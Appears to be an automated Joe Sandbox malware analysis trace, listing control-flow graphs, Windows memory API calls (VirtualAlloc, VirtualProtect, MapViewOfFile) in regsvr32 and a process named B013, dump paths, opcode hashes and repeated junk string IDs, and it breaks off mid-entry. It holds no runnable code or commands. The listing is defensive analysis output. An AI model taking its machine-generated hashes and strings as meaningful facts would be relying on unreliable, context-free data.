                                                                                                                                                                                                                                                                                                                                  control_flow_graph 128 4ff1ad0-4ff1b7f 129 4ff1b81-4ff1ba1 128->129 129->129 130 4ff1ba3-4ff1bd1 129->130 131 4ff1bd5-4ff1bd7 130->131 132 4ff1bdd-4ff1c12 131->132 133 4ff1cb0-4ff1cba 131->133 134 4ff1c14-4ff1c18 132->134 135 4ff1c63-4ff1cab 132->135 136 4ff1e44-4ff1e57 133->136 137 4ff1cc0-4ff1cca 133->137 134->135 138 4ff1c1a 134->138 148 4ff1def-4ff1df5 135->148 139 4ff1d68-4ff1d72 137->139 140 4ff1cd0-4ff1d63 137->140 143 4ff1c1c-4ff1c61 138->143 141 4ff1d78-4ff1d81 139->141 142 4ff1e24-4ff1e3f 139->142 140->131 146 4ff1e17-4ff1e1f 141->146 147 4ff1d87-4ff1d91 141->147 142->131 143->135 143->143 146->131 149 4ff1dfa-4ff1e12 147->149 150 4ff1d93-4ff1d9d 147->150 148->131 149->131 150->131 151 4ff1da3-4ff1deb MapViewOfFile 150->151 151->148
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FF1DDC
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3314676101-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3ae2ba7e4ce9a82f53c9d60112a9e14d397083eb01ef1099b31c53b76d2003b4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ef69ff5f05603895baae6aa2bb3bb9c5ba933294d23023a10a1c74037a9a86f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ae2ba7e4ce9a82f53c9d60112a9e14d397083eb01ef1099b31c53b76d2003b4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEA17072A183518FD324CF29C98069AF7E2BFC8314F16892DE99997354DB30BC06CB81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 152 4ff5c80-4ff5d2f 153 4ff5d55-4ff5d6a 152->153 154 4ff5d31-4ff5d53 152->154 155 4ff5f3a-4ff5f48 153->155 156 4ff5d70-4ff5d84 153->156 154->153 154->154 157 4ff5d8a-4ff5d94 156->157 158 4ff5d9f-4ff5da9 157->158 159 4ff5d96-4ff5d9a 157->159 161 4ff5dab-4ff5dbd 158->161 162 4ff5dc2-4ff5dcc 158->162 160 4ff5f10-4ff5f1a 159->160 165 4ff5f2f-4ff5f34 160->165 166 4ff5f1c-4ff5f2c 160->166 161->160 163 4ff5dce-4ff5e0f CreateFileMappingW 162->163 164 4ff5e14-4ff5e1e 162->164 167 4ff5f08-4ff5f0c 163->167 164->160 168 4ff5e24-4ff5f02 164->168 165->155 165->157 166->165 167->160 168->167
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04FF5E07
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8fc008e3fc54200a7da2cd7601a00dd8a0a973f2c471a9d4eddc467e4dd12922
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b4158a41efaabab5e46abad02e93f666fca27702bd651b5b765ccb2816cb905
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fc008e3fc54200a7da2cd7601a00dd8a0a973f2c471a9d4eddc467e4dd12922
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2181A236A187518FC714CE28C98095AFBE2BFC9210F558B5DF5958B3A9CB30A846CB81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 171 4ff69c0-4ff6a35 172 4ff6a37-4ff6a5f 171->172 172->172 173 4ff6a61-4ff6a99 172->173 174 4ff6aa0-4ff6aa2 173->174 175 4ff6adb-4ff6ae5 174->175 176 4ff6aa4-4ff6ad9 FindCloseChangeNotification 174->176 177 4ff6aeb-4ff6bc4 call 4ff2870 175->177 178 4ff6bc9-4ff6bd3 175->178 176->174 177->174 179 4ff6c27-4ff6c37 178->179 180 4ff6bd5-4ff6bdf 178->180 181 4ff6c3b-4ff6c3f 179->181 183 4ff6c21-4ff6c25 180->183 184 4ff6be1-4ff6beb 180->184 181->174 183->181 185 4ff6bed-4ff6bf7 184->185 186 4ff6c10-4ff6c1f 184->186 185->174 188 4ff6bfd-4ff6c0d 185->188 186->181
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 04FF6AC3
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7b508000dcfb0ec8edcb8c41ae0971454546df5acb388866ea7c606a3d9b39d7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a5b41de7178f6613b19fd9b70d363cac60a4ba5b5adacff6b06496c4a63fe8ec
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b508000dcfb0ec8edcb8c41ae0971454546df5acb388866ea7c606a3d9b39d7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1571A232A183508FD714CE29C88155ABBE2BFC9314F158A6DE995973A0DB35EC46CB82
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 191 4ff6370-4ff640f 192 4ff642b-4ff646d 191->192 193 4ff6411 191->193 195 4ff6474-4ff6476 192->195 194 4ff6413-4ff6429 193->194 194->192 194->194 196 4ff647c-4ff6486 195->196 197 4ff669b-4ff66ae 195->197 198 4ff6488-4ff64cd VirtualFree 196->198 199 4ff64d2-4ff64dc 196->199 197->195 200 4ff664d-4ff6651 198->200 201 4ff6685-4ff6696 199->201 202 4ff64e2-4ff64ec 199->202 200->195 201->195 203 4ff6679-4ff6680 202->203 204 4ff64f2-4ff64fc 202->204 203->195 205 4ff6656-4ff6660 204->205 206 4ff6502-4ff656b 204->206 205->195 207 4ff6666-4ff6676 205->207 209 4ff656d 206->209 210 4ff65ac-4ff664a 206->210 211 4ff656f-4ff65a6 209->211 210->200 211->211 212 4ff65a8 211->212 212->210
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 04FF64AE
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 71716451b3cfb38fbc3800170a8798004e49b8388058c23ac076b3343cfb1930
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 872700431bff758bc2299c113c4d53941ef7b456c50fdf3a8e513b269145ea15
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71716451b3cfb38fbc3800170a8798004e49b8388058c23ac076b3343cfb1930
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7991D176A043518FD314CF29C98062AFBE2BFC8314F298A5DE594DB361DB70E806CB81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 214 4ff66c0-4ff675c 215 4ff675e-4ff6786 214->215 215->215 216 4ff6788-4ff67d6 215->216 217 4ff67dc-4ff67de 216->217 218 4ff6995-4ff69af 217->218 219 4ff67e4-4ff67ef 217->219 218->217 220 4ff67f5-4ff67fd 219->220 221 4ff6983-4ff6992 219->221 222 4ff6976 220->222 223 4ff6803-4ff680b 220->223 224 4ff6979-4ff697e 222->224 225 4ff680d-4ff685d VirtualAlloc 223->225 226 4ff6862-4ff686a 223->226 224->217 225->217 227 4ff6952-4ff695a 226->227 228 4ff6870-4ff694d 226->228 227->217 229 4ff6960-4ff6974 227->229 228->217 229->224
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04FF6838
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2088361393.0000000004FF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FF1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4ff1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b7ecc9f2ea8e4373ba8bcf5230770964990425cb4ece9013918d6276cec2d653
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3bd2507ca04688725ac11fc231d108aef9331614fce3d7edb313c051c44d29b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7ecc9f2ea8e4373ba8bcf5230770964990425cb4ece9013918d6276cec2d653
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4917176E002298FDB14CF69C98169DFBB6FF88310F15815AD919E7355DB30A942CF80
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2087319288.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_2df0000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8b3f47a5e99f72dd1caf7b1f97387e3eff2290d103e437664589e74d6803933
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 75cd30d59ba88cc8e9d114f49dae66dd4d235de6b1984dc7bd6363ba19051513
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b3f47a5e99f72dd1caf7b1f97387e3eff2290d103e437664589e74d6803933
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F819BB4E04218CFDB54CF99C990A9DFBB1FF48310F2581AAD908AB352D735A985CF50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 121 2df19c4-2df1a39 122 2df1a8e-2df1af3 VirtualProtect 121->122 123 2df1a3b-2df1a60 121->123 122->123 124 2df1a66 123->124 125 2df1b84-2df1bed call 2df14c5 123->125 124->121
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2087319288.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_2df0000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4244c0623523e8d573082e5d78201ef0ff5296acc65b758ff40a0835bd0f8d3a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7177c3d66bf2c28a5ba01dcc82504e6c377a0c9b5de1e1426128e54e2012ad2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4244c0623523e8d573082e5d78201ef0ff5296acc65b758ff40a0835bd0f8d3a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06419BB5E00228CFDB64CF18C880B89BBB1FF49314F158199CA49AB346D731AD86CF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2087319288.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_2df0000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b32aa977ae0b3659902d2a61e8791a989fcaae5e3b0c030d7bce5b11d52042a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a3fd2dce4eda05c0de600dc7a669e44a2c0233ddd92eb817d9bdb1ebc50dc6d4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b32aa977ae0b3659902d2a61e8791a989fcaae5e3b0c030d7bce5b11d52042a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D041FFB09002058BDB44DFA8C554BAEBBF0FF48304F21856ED858AB341D77AA946CF95
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-388095546
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 397cbd791688fd2067301175ccbfafb088ad2cb037a38f68cbe7f00027bf95c6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 92296bc21e7db65491ac3d72d9536bd6a7a0a2407ec8418be47401192b37c330
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 397cbd791688fd2067301175ccbfafb088ad2cb037a38f68cbe7f00027bf95c6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5771EF74E11218DFDF18DFA9D594AADBBB2FF89300F209069E425AB354DB359842CF40
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6169f2fa08694b0d4f17207b2ef9f7cbc5d14ed2eae9be4f7390bb4e27631ec0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c129fa30b7cf48964075a4cca7ee9a18a8df08d9692d4a606760325eb77dcc27
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6169f2fa08694b0d4f17207b2ef9f7cbc5d14ed2eae9be4f7390bb4e27631ec0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71329D74E11229CFCB65DF69C990BD9BBB1BF89300F1081EAD549AB250EB706E85CF40
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 47015e107d61ed5202b2a6a364714d549a9b9ad951b04fe57360063aa21fdb25
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6221fb7188ecda5f91cfea0b4d85c2775868b0d9e27612b12a74bb69e7932845
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47015e107d61ed5202b2a6a364714d549a9b9ad951b04fe57360063aa21fdb25
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D225BB4E152298FDBA4DF69C990BDDBBB2BB49300F1081EAD509AB350DB315E85CF50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c68f4499164f2c9ea0aaf7f2a2627060c4394c95c560d2108539d5bbc93e4052
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc722451ffe800d0ec84aa2fe2fe483ccaaae81b627971585fb78812c9664b07
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c68f4499164f2c9ea0aaf7f2a2627060c4394c95c560d2108539d5bbc93e4052
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D602A074A112298FDBA4DF64C990B9DBBB2BF89300F1085E9D409A7350DB356E85CF51
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1605395142
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bf3d88ff9bbf54dc1536055b6f25e3014761341610c425f0d10ba9f19c2304d2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fde986ddac64b95adb2efd5dd5fa8d89711a56cb9d8ab08b8c35e775963fe0ac
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf3d88ff9bbf54dc1536055b6f25e3014761341610c425f0d10ba9f19c2304d2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3272FC70A0022ADFCB18EF65F8A46DDB7F1FB84705F5049A9D04AAB268DF305D858F91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1605395142
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c048b4804da374a41d8a87cfcce72244961b1389ee04e67c5951eb8032abf64
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bd4289b9d5c246a881e40ffad4fc8d8d47d98e6c1d12b85f4d9491741c9444e4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c048b4804da374a41d8a87cfcce72244961b1389ee04e67c5951eb8032abf64
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4872FC70A0022ADFCB18EF65F8A46DDB7F1FB84705F5049A9D04AAB268DF305D858F91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: `Q^q$`Q^q$`Q^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-846367443
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d5c8fffeba9a5a97be10ec22722d9b541642b7448cf54d44dc3f41a3c2f4924a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 88461b5decdc4be3ddf821cc39dfc42c0fef755bb8ab191fc0e232f745280e92
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5c8fffeba9a5a97be10ec22722d9b541642b7448cf54d44dc3f41a3c2f4924a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921D430F002159AEF25DB79D8147AEB6E2FFC6B14F28016AD105AB2C4C7B0984587E2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q
